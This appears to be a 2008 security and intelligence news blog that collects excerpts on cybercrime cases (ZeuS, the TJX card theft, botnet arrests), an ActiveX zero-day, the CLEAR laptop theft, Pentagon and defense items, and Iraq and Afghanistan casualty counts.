Much of the report reads like a fairly standard military history -- not unlike Max Boot's War Made New. However, "in an extraordinary passage, the study cites the Roman experience — from over a millennium ago — as a precedent for America's long-term dominance," Elliott notes.

More here.

E-Mail Hacking Case Could Redefine Online Privacy

Ellen Nakashima writes in The Washington Post:

A federal appeals court in California is reviewing a lower court's definition of "interception" in the digital age, in a case that some legal experts say could weaken consumer privacy protections online.

The case, Bunnell v. Motion Picture Association of America, involves a hacker who in 2005 broke into a file-sharing company's server and obtained copies of company e-mails as they were being transmitted. He then e-mailed 34 pages of the documents to an MPAA executive, who paid the hacker $15,000 for the job, according to court documents.

The issue boils down to the judicial definition of an intercept in the electronic age, in which packets of data move from server to server, alighting for milliseconds before speeding onward. The ruling applies only to the 9th District, which includes California and other Western states, but could influence other courts around the country.

More here.

USAF Takes Control of First SBIRS Satellite

Martin Seiff writes for UPI:

The U.S. Air Force has taken over control of the first Space Based Infrared System -- SBIRS -- orbiting missile launch detection system.

Lockheed Martin, whose Space Systems Co. is the prime contractor on the SBIRS project, announced in a statement Tuesday it had completed the transfer of payload and ground system operations of the first SBIRS Highly Elliptical Orbit -- HEO-1 -- satellite to the U.S. Air Force, in preparation for what Lockheed Martin described as "certified operations," which is scheduled to begin before the end of 2008.

The SBIRS system is the next generation of intelligence, surveillance and reconnaissance -- ISR -- for ballistic missile defense in space. It is planned to give the earliest possible alert of any potentially hostile ballistic missile launches around the world and to fulfill other space-based technical intelligence and battle-space surveillance functions.

The HEO-1 was fired into orbit in November 2006, and Lockheed Martin said it has since "been exceeding performance specifications during an extensive on-orbit test regimen" before being turned over to the U.S. Air Force for active service.

More here.

Russian Gang Hijacking PCs in Vast Scheme

John Markoff writes in The New York Times:

A criminal gang is using software tools normally reserved for computer network administrators to infect thousands of PCs in corporate and government networks with programs that steal passwords and other information, a security researcher has found.

The new form of attack indicates that little progress has been made in defusing the threat of botnets, networks of infected computers that criminals use to send spam, steal passwords and do other forms of damage, according to computer security investigators.

Several security experts say that although attacks against network administrators are not new, the systematic use of administrative software to spread malicious software has not been widely seen until now.

The gang was identified publicly in May by Joe Stewart, director of malware research at SecureWorks, a computer security firm in Atlanta. Mr. Stewart, who has determined that the gang is based in Russia, was able to locate a central program controlling as many as 100,000 infected computers across the Internet. The program was running at a commercial Internet hosting computer center in Wisconsin.

Mr. Stewart alerted a federal law enforcement agency that he declined to identify, and he said that it was investigating the matter. Although the original command program was shut down, the gang immediately reconstituted the system, he said, moving the control program to another computer in the Ukraine, beyond the reach of law enforcement in the United States.

More here.

Pentagon Shuts Down CIFA

Via Nukes & Spooks.


With every day that goes by, it seems, another piece of the edifice that Don Rumsfeld erected at the Pentagon is dismantled.

Today comes the news, not unexpected, that Defense Secretary Robert Gates has shuttered--the official euphemism is "disestablished"--the Counterintelligence Field Activity, or CIFA.

CIFA was widely criticized for gathering data on anti-war protesters, allegedly because they represented a threat to military bases and facilities, under a program known as Talon. The agency was the brainchild of Rumsfeld aides Stephen Cambone and Paul Wolfowitz. (Our colleague Walter Pincus of the Washington Post did a lot of the groundbreaking reporting on this issue).

The Talon database, itself shut down last year, had about 13,000 entries, including nearly 3,000 reports on U.S. citizens.

More here.

Hat-tip: Danger Room

California Controller: State Computers Can't Handle Pay Cut

Kevin Yamamura writes in The Sacramento Bee:

If Gov. Arnold Schwarzenegger wants to issue minimum-wage checks to 200,000 state workers in less than a month, he may want to rehire any semi-retired computer programmers he terminated last week.

The massive pay cut would exhaust the state's antiquated payroll system, which is built on a Vietnam-era computer language so outdated that many college students don't even bother to learn it anymore.

Democratic state Controller John Chiang said Monday it would take at least six months to reconfigure the state's payroll system to issue blanket checks at the federal minimum wage of $6.55 per hour, though Schwarzenegger insists such a change should occur this month.

Experts say Chiang isn't joking when he describes the state's payroll system as a computing relic on par with vacuum tubes and floppy disks.

More here.

Meet A-Z: The Computer Hacker Behind a Cyber Crime Wave

Byron Acohido writes on USA Today:

He goes by the nickname A-Z and is one of Russia's bright young tech stars. He's a crack programmer, successful entrepreneur and creator of sophisticated software tools that help his customers make millions.

Trouble is, A-Z's masterstroke is a computer program called ZeuS that helps cybergangs steal people's identity data and pull off Web scams on a vast scale. Last fall, German criminals used ZeuS to pull off an Ocean's Eleven-like caper, hijacking $6 million from banks in the United States, United Kingdom, Spain and Italy, says SecureWorks, an Atlanta-based company that monitors Internet crime and supplies security systems for 2,100 companies and government agencies.

A few years ago, skilled hackers such as A-Z concentrated most of their efforts on setting loose globe-spanning Internet viruses, mainly for bragging rights. But cybercrime is now a fast-expanding, global industry, security researchers and law enforcement officials say. Because it most often goes undetected and unreported, cybercrime is difficult to measure. A benchmark widely cited by the tech-security community is that its value tops $100 billion a year, outpacing global drug trafficking.

More here.

U.S. Dept. of Justice Charges 11 in Theft of 40 Million Card Numbers

A Reuters newswire article, via The New York Times, reports that:

The Justice Department said on Tuesday that it had charged 11 people in the theft of tens of millions of credit and debit card numbers of customers shopping at major retailers, including TJX Companies, in one of the largest reported identity-theft incidents on record.

The United States Attorney in Boston said those charged were involved in the theft of more than 40 million credit and debit card numbers.

TJX, of Framingham, Mass., which owns the Marshall’s and TJ Maxx chains, was the hardest hit by the ring, acknowledging in March 2007 that information from 45.7 million credit cards was stolen from its computers.

The charges focus on three people from the United States, three from the Ukraine, two from China, one from Estonia and one from Belarus.

The authorities said that the scheme was spearheaded by a Miami man named Albert Gonzalez, who hacked into the computer systems of retailers including TJX, BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21 and DSW Inc. The numbers were then stored on computer servers in the United States and Eastern Europe.

They then sold the information to people in the United States and Europe, who used it to withdraw tens of thousands of dollars at a time from automated teller machines, the authorities said.

More here.

Security Fix: Microsoft to Open Kimono on Security Patches

Brian Krebs writes on Security Fix:

In a bid to help the security industry stay a step ahead of cyber crooks, Microsoft will release additional details behind the vulnerabilities it patches each month to anti-virus companies and other large vendors of Windows security software.

While Microsoft already provides a brief fact sheet of which components of Windows will be fixed prior to its regular patch releases on the second Tuesday of each month, known as "Patch Tuesday," security vendors say additional details will help them more swiftly update their software to detect the latest attacks.

In particular, software companies rarely have enough time to develop attack "signatures," snippets of code or Internet traffic that, when found on a network or PC, could indicate an attacker is trying to leverage the flaws.

Under a new program starting with October's Patch Tuesday cycle, Microsoft will begin releasing technical details that should allow security vendors to very quickly develop those signatures and gain a head start before the crooks learn to exploit the vulnerabilities.

More here.

Monday, August 04, 2008

Retarded Quote of The Day: Steven Brill

"We don't believe the security or privacy of these would-be members will be compromised in any way."

- Steven Brill, CEO of Verified Identity Pass, who was quoted in a Bloomberg News article regarding the theft of a laptop at the San Francisco International Airport containing the confidential information of 33,000 people on the U.S. Customs CLEAR program. Simply astounding.

Beware the Hype: Black Hat 2008

Robert Vamosi writes on C|Net News:

Black Hat 2008 is bigger, and some might say better. Occupying most of the third and fourth floors of the convention hall at Caesar's Palace, the conference started on Saturday with two- and four-day training sessions which continue through Tuesday.

The "public" part of Black Hat runs Wednesday and Thursday and features speakers in 15 separate tracks. One of the tracks will consist of Turbo talks of 20 minutes each. Afterward there will be an opportunity for the audience to talk with some of the speakers in another room.

More here.

Note: Yeah, sure it will be bigger, but somehow I doubt it will be better.

It will certainly be entertaining, no doubt.

But will it be groundbreaking?

Short answer: No, I don't think so.

I will not be at Black Hat/DefCon this year (I've been the past couple of years, but really -- I hate Vegas), but I will be covering any relevant security news coming out of there. So stay tuned.

- ferg

Spammer Soloway Once Felt 'Invincible'

Vanessa Ho writes in The Seattle Post-Intelligencer:

Strangers hated him, blamed him for wrecking their lives, deemed him a time-sucking pariah who grated on millions of people worldwide.

None of that mattered to Robert Soloway; it was part of his fortune, his way. As he vexed others, he drove Porsches, dressed in Prada, had a penthouse and lived a playboy's life.

But his insecurity was never far behind. By the time federal agents arrested him for spewing illegal e-mails, he didn't much protest the moniker they gave him – the Spam King.

"Here's my dysfunction," Soloway said recently. "It was that notoriety. People knew me. No one clapped for me at my high school graduation. Maybe it's not how I want to be famous, but (my thinking was) 'At least people know who I am.' "

Once considered one of the most prolific spammers in the world – sending millions of e-mails a day for years – Soloway was sentenced last month to nearly four years in prison after pleading guilty to tax evasion and e-mail and wire fraud.

More here.

U.S. Toll in Iraq, Afghanistan


Iraq and Afghanistan statistics via The Boston Globe (AP).

As of Monday, Aug. 4, 2008, at least 4,131 members of the U.S. military have died in the Iraq war since it began in March 2003, according to an Associated Press count.

The figure includes eight military civilians killed in action. At least 3,362 died as a result of hostile action, according to the military's numbers.

The AP count is two more than the Defense Department's tally, last updated Monday at 10 a.m. EDT.

As of Monday, Aug. 4, 2008, at least 491 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures July 26 at 10 a.m. EDT.

Of those, the military reports 347 were killed by hostile action.

More here and here.

And as always, the Iraq Coalition Casualty Count keeps the grim watch on their website here.

Honor the Fallen.

Online Threats Cost Consumers $8.5 Billion Over Last Two Years

Thomas Claburn writes on InformationWeek:

Consumers have lost almost $8.5 billion over the last two years to viruses, spyware, and phishing attacks. But computer security problems have been good for the computer business -- consumers replaced some 2.1 million computers due to malware infections.

Consumer Reports published these findings in its September issue as part of its annual State of the Net survey. The data is based on a survey of 2,071 online households conducted by the Consumer Reports National Research Center.

Among other notable data points: consumers have a 1 in 6 chance of being victimized by cybercrime, down from a 1 in 4 chance in 2007; 19% of respondents said they didn't have anti-virus software on their computer; and 75% of respondents said they didn't have an anti-phishing toolbar.

Consumer Reports also lists what it considers to be the seven most common online blunders. These include failing to keep anti-virus software up-to-date; clicking on e-mail links to access financial Web sites; using a single password for all online accounts; downloading free software; assuming that Macs are safer than Windows PCs; clicking on "scareware" pop-up ads that claim your computer is at risk; and shopping online without taking extra precautions.

More here.

Verified Identity Pass: CLEAR Suspended Following Laptop Theft - UPDATE

Via ABC7.com.

Verified Identity Pass, which operates under the brand name Clear, was suspended by the Transportation Security Administration Monday after a laptop containing personal information for 33,000 people signing up for their registered traveler program was stolen from San Francisco International Airport.

The company is in the process of notifying the people, who were signing up for an expedited airport check-in service, that their personal information may have been stolen.

Officials said a laptop containing the data was stolen from a locked office at the airport. The information on the laptop was not encrypted. There was no credit card data or any social security numbers stored on the laptop, but there were names, addresses and other personal data.

Verified Identity Pass will not be able to enroll new customers into the registered traveler program until the TSA verifies that the company is compliant with security procedures.

More here.

Hat-tip: Pogo Was Right

UPDATE: 13:03 PDT, 5 August 2008: Apparently, Verified Identity Pass now says they have recovered the missing PC, but some rather disturbing questions remain. -ferg

Attackers Ramp Up Zero-Day ActiveX Exploits

Dan Kaplan writes on SC Magazine US:

Attacks taking advantage of a zero-day vulnerability in a Microsoft ActiveX control are increasing in prevalence, nearly a month since the flaw and ensuing exploit code were first announced.

The bug, which enables an attacker to gain the privileges of a logged-on user to launch remote code, affects the ActiveX control for the Snapshot Viewer in Office Access 2000, 2002 and 2003, Microsoft has said.

"We've been closely monitoring this exploit since its release, and are now tracking several hundred occurrences in the wild, found mostly in China," according to a Websense Security Labs blog entry. "There is currently no patch available, but Microsoft has several workarounds listed in their advisory."

Exploit code was posted to the exploit database Milw0rm on July 24, according to Websense.

More here.

Beijing Braces for Olympic Cyber-War

James Rogers writes on Dark Reading:

With the world’s eyes firmly focused on Beijing, officials and IT staff are bracing themselves for a flood of cyber-attacks when the Olympic Games begin later this week.

For months now, there has been growing speculation that the Games’ Websites and back-end storage infrastructure could be targeted when the Olympic flame is lit in Beijing’s Bird’s Nest stadium on Friday, either by cybercriminals or political activists.

More here.

Hat-tip: Intel Fusion

Dutch Botnet Herders Arrested

Jan Libbenga writes on The Register:


Dutch police have arrested two Dutch brothers suspected of running a botnet controlling 40,000 to 100,000 computers, with only a small portion (1,100 computers) based in the Netherlands.

The FBI had been investigating this case for a while before contacting the Dutch authorities. The arrests were made shortly after the two young bot-herders from the Frisian town of Sneek sold their network of compromised machines to a person in Brazil for €25,000 on Tuesday. The 35-year-old Brazilian man from Taubate (near Rio de Janeiro) has also been arrested and is awaiting extradition to the US.

More here.

Sunday, August 03, 2008

In Passing: Alexander Solzhenitsyn


Alexander Solzhenitsyn
December 11, 1918 – August 3, 2008